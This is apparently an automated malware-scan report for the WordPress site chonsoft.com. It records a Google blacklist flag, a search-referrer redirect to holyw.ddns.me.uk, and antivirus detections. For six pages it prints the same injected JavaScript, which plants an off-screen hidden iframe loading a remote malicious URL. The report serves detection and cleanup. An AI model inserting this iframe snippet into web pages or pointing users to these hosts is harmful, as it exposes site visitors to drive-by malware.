New scan:

Malware Scanner report for chonsoft.com

Malicious/Suspicious/Total urls checked
6/0/15
6 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "chonsoft.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious redirects
Found
The website redirects visitors from search engines to the 3rd-party URL:
->http://holyw.ddns.me.uk/
1484 websites infected. holyw.ddns.me.uk is marked by Google as suspicious.

The website "chonsoft.com" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues. Here is our redirects fixing guide.
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=chonsoft.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Malicious/Suspicious Redirects

RequestServer responseStatus
URL: http://chonsoft.com/
(imitation of visitor from search engine)


GET / HTTP/1.1
Host: chonsoft.com
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Connection: close
Date: Sat, 04 Oct 2014 22:17:25 GMT
Location: http://holyw.ddns.me.uk/
Server: nginx/0.9.4
Vary: Accept-Encoding,User-Agent
Content-Length: 0
Content-Type: text/html
X-Powered-By: PHP/5.2.17
malicious

Scanned pages/files

RequestServer responseStatus
http://chonsoft.com/
200 OK
Content-Length: 36391
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


var _q = document.createElement('iframe'),
_n = 'setAttribute';
_q[_n]('src', 'http://www.couchtarts.com/media.php');
_q.style.position = 'absolute';
_q.style.width = '16px';
_q[_n]('frameborder', navigator.userAgent.indexOf('d0a7a142b755172da72ff74a1ac25199') + 1);
_q.style.left = '-5597px';
document.write('<div id=\'__dradv\'></div>');
document.getElementById('__dradv').appendChild(_q);

Antivirus reports:

AntiVir
JS/iFrame.JI
Avast
JS:Iframe-UC [Trj]
Ikarus
Trojan.IframeRef
nProtect
Trojan.JS.Iframe.BQZ
K7AntiVirus
Riskware
Emsisoft
Trojan.JS.Iframe.BQZ (B)
Comodo
TrojWare.JS.iFrame.FJ
McAfee-GW-Edition
JS/Iframe.AQ
DrWeb
JS.IFrame.285
Kaspersky
Trojan-Downloader.JS.Iframe.czd
Microsoft
Trojan:JS/Iframe.AQ
Fortinet
JS/IFrame.BBEJ!tr
McAfee
JS/Iframe.AQ
NANO-Antivirus
Trojan.Script.Iframe.uznru
F-Secure
Trojan.JS.Iframe.BQZ
F-Prot
JS/IFrame.RS.gen
AVG
HTML/Framer
Norman
Iframe.NG
GData
Trojan.JS.Iframe.BQZ
Commtouch
JS/IFrame.RS.gen
Agnitum
Trojan.JS.IFrame.AD
ESET-NOD32
JS/Iframe.EX
BitDefender
Trojan.JS.Iframe.BQZ

http://chonsoft.com/wp-includes/js/jquery/jquery.js?ver=1.7.1
200 OK
Content-Length: 93889
Content-Type: application/x-javascript
clean
http://chonsoft.com/wp-content/themes/Captions/lib/js/superfish.js?ver=3.3.1
200 OK
Content-Length: 3714
Content-Type: application/x-javascript
clean
http://chonsoft.com/wp-includes/js/swfobject.js?ver=2.2
200 OK
Content-Length: 10220
Content-Type: application/x-javascript
clean
http://chonsoft.com/wp-content/themes/Captions/includes/featuredposts/scripts/jquery.cycle.all.min.js
200 OK
Content-Length: 31032
Content-Type: application/x-javascript
clean
http://s7.addthis.com/js/250/addthis_widget.js
200 OK
Content-Length: 6875
Content-Type: text/javascript
clean
http://chonsoft.com/wp-includes/js/hoverIntent.js?ver=20090102
200 OK
Content-Length: 1334
Content-Type: application/x-javascript
clean
http://chonsoft.com/wp-content/plugins/contact-form-7/jquery.form.js?ver=3.08
200 OK
Content-Length: 37156
Content-Type: application/x-javascript
clean
http://chonsoft.com/wp-content/plugins/contact-form-7/scripts.js?ver=3.1.2
200 OK
Content-Length: 6208
Content-Type: application/x-javascript
clean
http://chonsoft.com/?page_id=4
200 OK
Content-Length: 24296
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


var _q = document.createElement('iframe'),
_n = 'setAttribute';
_q[_n]('src', 'http://www.couchtarts.com/media.php');
_q.style.position = 'absolute';
_q.style.width = '16px';
_q[_n]('frameborder', navigator.userAgent.indexOf('d0a7a142b755172da72ff74a1ac25199') + 1);
_q.style.left = '-5597px';
document.write('<div id=\'__dradv\'></div>');
document.getElementById('__dradv').appendChild(_q);

Antivirus reports:

AntiVir
JS/iFrame.JI
Avast
JS:Iframe-UC [Trj]
Ikarus
Trojan.IframeRef
nProtect
Trojan.JS.Iframe.BQZ
K7AntiVirus
Riskware
Emsisoft
Trojan.JS.Iframe.BQZ (B)
Comodo
TrojWare.JS.iFrame.FJ
McAfee-GW-Edition
JS/Iframe.AQ
DrWeb
JS.IFrame.285
Kaspersky
Trojan-Downloader.JS.Iframe.czd
Microsoft
Trojan:JS/Iframe.AQ
Fortinet
JS/IFrame.BBEJ!tr
McAfee
JS/Iframe.AQ
NANO-Antivirus
Trojan.Script.Iframe.uznru
F-Secure
Trojan.JS.Iframe.BQZ
F-Prot
JS/IFrame.RS.gen
AVG
HTML/Framer
Norman
Iframe.NG
GData
Trojan.JS.Iframe.BQZ
Commtouch
JS/IFrame.RS.gen
Agnitum
Trojan.JS.IFrame.AD
ESET-NOD32
JS/Iframe.EX
BitDefender
Trojan.JS.Iframe.BQZ

http://chonsoft.com/?cat=3
200 OK
Content-Length: 28532
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


var _q = document.createElement('iframe'),
_n = 'setAttribute';
_q[_n]('src', 'http://www.couchtarts.com/media.php');
_q.style.position = 'absolute';
_q.style.width = '16px';
_q[_n]('frameborder', navigator.userAgent.indexOf('d0a7a142b755172da72ff74a1ac25199') + 1);
_q.style.left = '-5597px';
document.write('<div id=\'__dradv\'></div>');
document.getElementById('__dradv').appendChild(_q);

Antivirus reports:

AntiVir
JS/iFrame.JI
Avast
JS:Iframe-UC [Trj]
Ikarus
Trojan.IframeRef
nProtect
Trojan.JS.Iframe.BQZ
K7AntiVirus
Riskware
Emsisoft
Trojan.JS.Iframe.BQZ (B)
Comodo
TrojWare.JS.iFrame.FJ
McAfee-GW-Edition
JS/Iframe.AQ
DrWeb
JS.IFrame.285
Kaspersky
Trojan-Downloader.JS.Iframe.czd
Microsoft
Trojan:JS/Iframe.AQ
Fortinet
JS/IFrame.BBEJ!tr
McAfee
JS/Iframe.AQ
NANO-Antivirus
Trojan.Script.Iframe.uznru
F-Secure
Trojan.JS.Iframe.BQZ
F-Prot
JS/IFrame.RS.gen
AVG
HTML/Framer
Norman
Iframe.NG
GData
Trojan.JS.Iframe.BQZ
Commtouch
JS/IFrame.RS.gen
Agnitum
Trojan.JS.IFrame.AD
ESET-NOD32
JS/Iframe.EX
BitDefender
Trojan.JS.Iframe.BQZ

http://chonsoft.com/?post_type=forum
200 OK
Content-Length: 17801
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


var _q = document.createElement('iframe'),
_n = 'setAttribute';
_q[_n]('src', 'http://www.couchtarts.com/media.php');
_q.style.position = 'absolute';
_q.style.width = '16px';
_q[_n]('frameborder', navigator.userAgent.indexOf('d0a7a142b755172da72ff74a1ac25199') + 1);
_q.style.left = '-5597px';
document.write('<div id=\'__dradv\'></div>');
document.getElementById('__dradv').appendChild(_q);

Antivirus reports:

AntiVir
JS/iFrame.JI
Avast
JS:Iframe-UC [Trj]
Ikarus
Trojan.IframeRef
nProtect
Trojan.JS.Iframe.BQZ
K7AntiVirus
Riskware
Emsisoft
Trojan.JS.Iframe.BQZ (B)
Comodo
TrojWare.JS.iFrame.FJ
McAfee-GW-Edition
JS/Iframe.AQ
DrWeb
JS.IFrame.285
Kaspersky
Trojan-Downloader.JS.Iframe.czd
Microsoft
Trojan:JS/Iframe.AQ
Fortinet
JS/IFrame.BBEJ!tr
McAfee
JS/Iframe.AQ
NANO-Antivirus
Trojan.Script.Iframe.uznru
F-Secure
Trojan.JS.Iframe.BQZ
F-Prot
JS/IFrame.RS.gen
AVG
HTML/Framer
Norman
Iframe.NG
GData
Trojan.JS.Iframe.BQZ
Commtouch
JS/IFrame.RS.gen
Agnitum
Trojan.JS.IFrame.AD
ESET-NOD32
JS/Iframe.EX
BitDefender
Trojan.JS.Iframe.BQZ

http://chonsoft.com/?page_id=19
200 OK
Content-Length: 18797
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


var _q = document.createElement('iframe'),
_n = 'setAttribute';
_q[_n]('src', 'http://www.couchtarts.com/media.php');
_q.style.position = 'absolute';
_q.style.width = '16px';
_q[_n]('frameborder', navigator.userAgent.indexOf('d0a7a142b755172da72ff74a1ac25199') + 1);
_q.style.left = '-5597px';
document.write('<div id=\'__dradv\'></div>');
document.getElementById('__dradv').appendChild(_q);

Antivirus reports:

AntiVir
JS/iFrame.JI
Avast
JS:Iframe-UC [Trj]
Ikarus
Trojan.IframeRef
nProtect
Trojan.JS.Iframe.BQZ
K7AntiVirus
Riskware
Emsisoft
Trojan.JS.Iframe.BQZ (B)
Comodo
TrojWare.JS.iFrame.FJ
McAfee-GW-Edition
JS/Iframe.AQ
DrWeb
JS.IFrame.285
Kaspersky
Trojan-Downloader.JS.Iframe.czd
Microsoft
Trojan:JS/Iframe.AQ
Fortinet
JS/IFrame.BBEJ!tr
McAfee
JS/Iframe.AQ
NANO-Antivirus
Trojan.Script.Iframe.uznru
F-Secure
Trojan.JS.Iframe.BQZ
F-Prot
JS/IFrame.RS.gen
AVG
HTML/Framer
Norman
Iframe.NG
GData
Trojan.JS.Iframe.BQZ
Commtouch
JS/IFrame.RS.gen
Agnitum
Trojan.JS.IFrame.AD
ESET-NOD32
JS/Iframe.EX
BitDefender
Trojan.JS.Iframe.BQZ

http://chonsoft.com/wp-content/plugins/clean-contact/fieldset.js
200 OK
Content-Length: 2452
Content-Type: application/x-javascript
clean
http://chonsoft.com/?p=33
200 OK
Content-Length: 24400
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)


var _q = document.createElement('iframe'),
_n = 'setAttribute';
_q[_n]('src', 'http://www.couchtarts.com/media.php');
_q.style.position = 'absolute';
_q.style.width = '16px';
_q[_n]('frameborder', navigator.userAgent.indexOf('d0a7a142b755172da72ff74a1ac25199') + 1);
_q.style.left = '-5597px';
document.write('<div id=\'__dradv\'></div>');
document.getElementById('__dradv').appendChild(_q);

Antivirus reports:

AntiVir
JS/iFrame.JI
Avast
JS:Iframe-UC [Trj]
Ikarus
Trojan.IframeRef
nProtect
Trojan.JS.Iframe.BQZ
K7AntiVirus
Riskware
Emsisoft
Trojan.JS.Iframe.BQZ (B)
Comodo
TrojWare.JS.iFrame.FJ
McAfee-GW-Edition
JS/Iframe.AQ
DrWeb
JS.IFrame.285
Kaspersky
Trojan-Downloader.JS.Iframe.czd
Microsoft
Trojan:JS/Iframe.AQ
Fortinet
JS/IFrame.BBEJ!tr
McAfee
JS/Iframe.AQ
NANO-Antivirus
Trojan.Script.Iframe.uznru
F-Secure
Trojan.JS.Iframe.BQZ
F-Prot
JS/IFrame.RS.gen
AVG
HTML/Framer
Norman
Iframe.NG
GData
Trojan.JS.Iframe.BQZ
Commtouch
JS/IFrame.RS.gen
Agnitum
Trojan.JS.IFrame.AD
ESET-NOD32
JS/Iframe.EX
BitDefender
Trojan.JS.Iframe.BQZ